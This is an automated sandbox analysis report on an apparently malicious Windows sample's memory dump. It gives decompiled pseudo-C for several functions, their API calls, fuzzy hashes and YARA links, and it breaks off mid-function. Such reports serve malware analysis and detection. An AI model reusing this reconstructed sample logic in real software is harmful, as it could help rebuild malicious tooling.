                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: ccf47f12b2d48c2d5c58757a08bbe4396d61fb97564b342f6ec2201bae54dd01
                                                                                                                                                                                                                                • Instruction ID: 5b935811ff28a26e898a297b515dda879b36a2fc36ef36525cb9c89fcd1adf0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccf47f12b2d48c2d5c58757a08bbe4396d61fb97564b342f6ec2201bae54dd01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E521A776A00618FFDB11DFE5C989DAEBBF8AF44744B5044AAE502E7200DB349A45DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A9462F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                                                                                                			E00A9462F(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xa9d380; // 0x4fd9ba8
				_push(0x800);
				_push(0);
				_push( *0xa9d270);
				if( *0xa9d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xa9d284 =  *0xa9d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00A9680B(_t44, _t40);
						_t18 = E00A92274(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xa9d284 < 5) {
								 *0xa9d284 =  *0xa9d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00A9651D();
						HeapFree( *0xa9d270, 0, _t40);
						goto L10;
					}
					_t24 = E00A9A565(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00A970F4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                                                                                                                                                0x00a9462f
                                                                                                                                                                                                                                0x00a9462f
                                                                                                                                                                                                                                0x00a94632
                                                                                                                                                                                                                                0x00a94633
                                                                                                                                                                                                                                0x00a9463d
                                                                                                                                                                                                                                0x00a94644
                                                                                                                                                                                                                                0x00a94649
                                                                                                                                                                                                                                0x00a9464b
                                                                                                                                                                                                                                0x00a94651
                                                                                                                                                                                                                                0x00a94679
                                                                                                                                                                                                                                0x00a94691
                                                                                                                                                                                                                                0x00a94693
                                                                                                                                                                                                                                0x00a94694
                                                                                                                                                                                                                                0x00a94696
                                                                                                                                                                                                                                0x00a946d4
                                                                                                                                                                                                                                0x00a946d4
                                                                                                                                                                                                                                0x00a946da
                                                                                                                                                                                                                                0x00a946e0
                                                                                                                                                                                                                                0x00a946e0
                                                                                                                                                                                                                                0x00a94698
                                                                                                                                                                                                                                0x00a9469e
                                                                                                                                                                                                                                0x00a946a1
                                                                                                                                                                                                                                0x00a946b0
                                                                                                                                                                                                                                0x00a946b2
                                                                                                                                                                                                                                0x00a946b9
                                                                                                                                                                                                                                0x00a946ed
                                                                                                                                                                                                                                0x00a946f2
                                                                                                                                                                                                                                0x00a946f4
                                                                                                                                                                                                                                0x00a946f6
                                                                                                                                                                                                                                0x00a946f6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a946f4
                                                                                                                                                                                                                                0x00a946bb
                                                                                                                                                                                                                                0x00a946c0
                                                                                                                                                                                                                                0x00a946ce
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a946ce
                                                                                                                                                                                                                                0x00a94688
                                                                                                                                                                                                                                0x00a9468d
                                                                                                                                                                                                                                0x00a9468d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9468d
                                                                                                                                                                                                                                0x00a9465b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9466a
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A94653
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: GetTickCount.KERNEL32 ref: 00A97108
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A97158
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A97175
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A971A1
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: HeapFree.KERNEL32(00000000,?), ref: 00A971B3
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: wsprintfA.USER32 ref: 00A971D4
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: HeapFree.KERNEL32(00000000,?), ref: 00A971E4
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A97212
                                                                                                                                                                                                                                  • Part of subcall function 00A970F4: GetTickCount.KERNEL32 ref: 00A97223
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00A94671
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000002,00A9A0CB,?,00A9A0CB,00000002,?,?,00A958BD,?), ref: 00A946CE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1676223858-1536154274
                                                                                                                                                                                                                                • Opcode ID: 75201c5250a24b97e5bcac9979f5bacaaad2a5f8cc2b87d0dfa7de08dab31443
                                                                                                                                                                                                                                • Instruction ID: 1811339ad0b3879320ba434fda79db982f7b4f864b979c2dfff3319986fa713f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75201c5250a24b97e5bcac9979f5bacaaad2a5f8cc2b87d0dfa7de08dab31443
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C92138B6300205EBDF11DF94DD85EDA37FCAB0A354F100026FA02AB251DB70E946DBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A92EA6, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00A92EE1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A92FC6
                                                                                                                                                                                                                                  • Part of subcall function 00A96533: SysAllocString.OLEAUT32(00A9C2B0), ref: 00A96583
                                                                                                                                                                                                                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A93019
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A93028
                                                                                                                                                                                                                                  • Part of subcall function 00A9590A: Sleep.KERNEL32(000001F4), ref: 00A95952
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3193056040-0
                                                                                                                                                                                                                                • Opcode ID: 73b761615d8beb3a256d9719d2d7d0fd4bc97cbefd5bf8cc897e86d8dc0c7787
                                                                                                                                                                                                                                • Instruction ID: 7ac37719d709c50734b9cda2c126a01e648d2e36eb7175c4a1a085cc864fa197
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73b761615d8beb3a256d9719d2d7d0fd4bc97cbefd5bf8cc897e86d8dc0c7787
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B512C36A00609EFDF11CFA8C944A9AB7F5FF88750F158829E505DB224DB71EE46CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96533, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 46%
                                                                                                                                                                                                                                			E00A96533(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xa9d2e0; // 0x453a5a8
					_t5 = _t103 + 0xa9e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xa9c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xa9d2e0; // 0x453a5a8
												_t28 = _t109 + 0xa9e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xa9d2e0; // 0x453a5a8
														_t33 = _t79 + 0xa9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                                                                                                                                0x00a96538
                                                                                                                                                                                                                                0x00a96541
                                                                                                                                                                                                                                0x00a96542
                                                                                                                                                                                                                                0x00a96546
                                                                                                                                                                                                                                0x00a9654c
                                                                                                                                                                                                                                0x00a96552
                                                                                                                                                                                                                                0x00a9655b
                                                                                                                                                                                                                                0x00a96561
                                                                                                                                                                                                                                0x00a9656b
                                                                                                                                                                                                                                0x00a9656d
                                                                                                                                                                                                                                0x00a96573
                                                                                                                                                                                                                                0x00a96578
                                                                                                                                                                                                                                0x00a96583
                                                                                                                                                                                                                                0x00a96589
                                                                                                                                                                                                                                0x00a9658e
                                                                                                                                                                                                                                0x00a966b0
                                                                                                                                                                                                                                0x00a96594
                                                                                                                                                                                                                                0x00a96594
                                                                                                                                                                                                                                0x00a965a1
                                                                                                                                                                                                                                0x00a965a7
                                                                                                                                                                                                                                0x00a965ad
                                                                                                                                                                                                                                0x00a965b1
                                                                                                                                                                                                                                0x00a965b7
                                                                                                                                                                                                                                0x00a965c4
                                                                                                                                                                                                                                0x00a965c8
                                                                                                                                                                                                                                0x00a965ce
                                                                                                                                                                                                                                0x00a965d1
                                                                                                                                                                                                                                0x00a965d9
                                                                                                                                                                                                                                0x00a965da
                                                                                                                                                                                                                                0x00a965de
                                                                                                                                                                                                                                0x00a965e2
                                                                                                                                                                                                                                0x00a965e5
                                                                                                                                                                                                                                0x00a965e8
                                                                                                                                                                                                                                0x00a965ee
                                                                                                                                                                                                                                0x00a965f7
                                                                                                                                                                                                                                0x00a965fd
                                                                                                                                                                                                                                0x00a965fe
                                                                                                                                                                                                                                0x00a96601
                                                                                                                                                                                                                                0x00a96602
                                                                                                                                                                                                                                0x00a96603
                                                                                                                                                                                                                                0x00a9660b
                                                                                                                                                                                                                                0x00a9660c
                                                                                                                                                                                                                                0x00a9660d
                                                                                                                                                                                                                                0x00a9660f
                                                                                                                                                                                                                                0x00a96613
                                                                                                                                                                                                                                0x00a96617
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9661d
                                                                                                                                                                                                                                0x00a96626
                                                                                                                                                                                                                                0x00a9662c
                                                                                                                                                                                                                                0x00a96636
                                                                                                                                                                                                                                0x00a9663a
                                                                                                                                                                                                                                0x00a9663c
                                                                                                                                                                                                                                0x00a96649
                                                                                                                                                                                                                                0x00a9664d
                                                                                                                                                                                                                                0x00a96655
                                                                                                                                                                                                                                0x00a9665a
                                                                                                                                                                                                                                0x00a9666c
                                                                                                                                                                                                                                0x00a9666e
                                                                                                                                                                                                                                0x00a96674
                                                                                                                                                                                                                                0x00a96674
                                                                                                                                                                                                                                0x00a9667d
                                                                                                                                                                                                                                0x00a9667d
                                                                                                                                                                                                                                0x00a9667f
                                                                                                                                                                                                                                0x00a96685
                                                                                                                                                                                                                                0x00a96685
                                                                                                                                                                                                                                0x00a96688
                                                                                                                                                                                                                                0x00a9668e
                                                                                                                                                                                                                                0x00a96691
                                                                                                                                                                                                                                0x00a9669a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9669a
                                                                                                                                                                                                                                0x00a965ee
                                                                                                                                                                                                                                0x00a965e8
                                                                                                                                                                                                                                0x00a965d1
                                                                                                                                                                                                                                0x00a966a0
                                                                                                                                                                                                                                0x00a966a0
                                                                                                                                                                                                                                0x00a966a6
                                                                                                                                                                                                                                0x00a966a6
                                                                                                                                                                                                                                0x00a966ac
                                                                                                                                                                                                                                0x00a966ac
                                                                                                                                                                                                                                0x00a966b5
                                                                                                                                                                                                                                0x00a966bb
                                                                                                                                                                                                                                0x00a966bb
                                                                                                                                                                                                                                0x00a96578
                                                                                                                                                                                                                                0x00a966c4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00A9C2B0), ref: 00A96583
                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A96664
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A9667D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A966AC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1885612795-0
                                                                                                                                                                                                                                • Opcode ID: 33a2316264ee3e90b1c947ef2e0e8db83dab77daebba08570c5fc04e5b75e19e
                                                                                                                                                                                                                                • Instruction ID: 3b288319af80d414e461c781120bd286c86d894ead3a37f43ec3e5fc5f8d27b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33a2316264ee3e90b1c947ef2e0e8db83dab77daebba08570c5fc04e5b75e19e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C515C75E00519EFCF04DFE8C9889AEB7B9FF89704B144589E905EB214DB31AD42CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A94EEE, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E00A94EEE(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00A9650C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00A95450(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00A97436(_t101,  &_v428, _a8, _t96 - _t81);
					E00A97436(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00A95450(_t101, 0xa9d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00A95450(_a16, _a4);
						E00A91072(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00A9AEC0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00A9AEBA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00A96A23(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00A967D9(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00A95465(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xa9d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                                                                                                                0x00a94ef1
                                                                                                                                                                                                                                0x00a94efd
                                                                                                                                                                                                                                0x00a94f03
                                                                                                                                                                                                                                0x00a94f08
                                                                                                                                                                                                                                0x00a94f0c
                                                                                                                                                                                                                                0x00a9507e
                                                                                                                                                                                                                                0x00a95082
                                                                                                                                                                                                                                0x00a95082
                                                                                                                                                                                                                                0x00a94f12
                                                                                                                                                                                                                                0x00a94f16
                                                                                                                                                                                                                                0x00a94f1a
                                                                                                                                                                                                                                0x00a94f1d
                                                                                                                                                                                                                                0x00a94f28
                                                                                                                                                                                                                                0x00a94f2e
                                                                                                                                                                                                                                0x00a94f33
                                                                                                                                                                                                                                0x00a94f36
                                                                                                                                                                                                                                0x00a94f50
                                                                                                                                                                                                                                0x00a94f5f
                                                                                                                                                                                                                                0x00a94f6b
                                                                                                                                                                                                                                0x00a94f75
                                                                                                                                                                                                                                0x00a94f7a
                                                                                                                                                                                                                                0x00a94f7c
                                                                                                                                                                                                                                0x00a94f7f
                                                                                                                                                                                                                                0x00a95036
                                                                                                                                                                                                                                0x00a9503c
                                                                                                                                                                                                                                0x00a9504d
                                                                                                                                                                                                                                0x00a95060
                                                                                                                                                                                                                                0x00a95076
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9507b
                                                                                                                                                                                                                                0x00a94f88
                                                                                                                                                                                                                                0x00a94f8f
                                                                                                                                                                                                                                0x00a94f93
                                                                                                                                                                                                                                0x00a94f99
                                                                                                                                                                                                                                0x00a94f9b
                                                                                                                                                                                                                                0x00a94f9d
                                                                                                                                                                                                                                0x00a94f9f
                                                                                                                                                                                                                                0x00a94fa1
                                                                                                                                                                                                                                0x00a94fab
                                                                                                                                                                                                                                0x00a94fb0
                                                                                                                                                                                                                                0x00a94fb2
                                                                                                                                                                                                                                0x00a94fb4
                                                                                                                                                                                                                                0x00a94fb5
                                                                                                                                                                                                                                0x00a94fb6
                                                                                                                                                                                                                                0x00a94fb7
                                                                                                                                                                                                                                0x00a94fbe
                                                                                                                                                                                                                                0x00a94fc5
                                                                                                                                                                                                                                0x00a94fc8
                                                                                                                                                                                                                                0x00a94fc8
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94f95
                                                                                                                                                                                                                                0x00a94fd0
                                                                                                                                                                                                                                0x00a94fd8
                                                                                                                                                                                                                                0x00a94fe4
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94ff0
                                                                                                                                                                                                                                0x00a94ff3
                                                                                                                                                                                                                                0x00a95000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95002
                                                                                                                                                                                                                                0x00a95002
                                                                                                                                                                                                                                0x00a9500f
                                                                                                                                                                                                                                0x00a94fe9
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94fee
                                                                                                                                                                                                                                0x00a95019
                                                                                                                                                                                                                                0x00a9501c
                                                                                                                                                                                                                                0x00a9501f
                                                                                                                                                                                                                                0x00a95026
                                                                                                                                                                                                                                0x00a95026
                                                                                                                                                                                                                                0x00a95033
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95033
                                                                                                                                                                                                                                0x00a94f1f
                                                                                                                                                                                                                                0x00a94f23
                                                                                                                                                                                                                                0x00a94f24
                                                                                                                                                                                                                                0x00a94f26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94f26
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A94FA1
                                                                                                                                                                                                                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A94FB7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A95060
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A95076
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3041852380-0
                                                                                                                                                                                                                                • Opcode ID: fec8bf0c2eb182f8b98f082837c19ce8bd1dfd789bfa9154aa367cd83435c2e6
                                                                                                                                                                                                                                • Instruction ID: fc07f5bd123d7685d005b9dd9e3614bf567e95f71d07f6f878a6a38409c19bd0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fec8bf0c2eb182f8b98f082837c19ce8bd1dfd789bfa9154aa367cd83435c2e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B341C032B0021AAFDF209F68CD42FEE77F5EF49710F004569B909A7281DB70AE458B91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96C82, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E00A96C82(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xa9d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xa9d2e0; // 0x453a5a8
				_t3 = _t8 + 0xa9e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E00A96E66(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xa9d2e4, 1, 0, _t30);
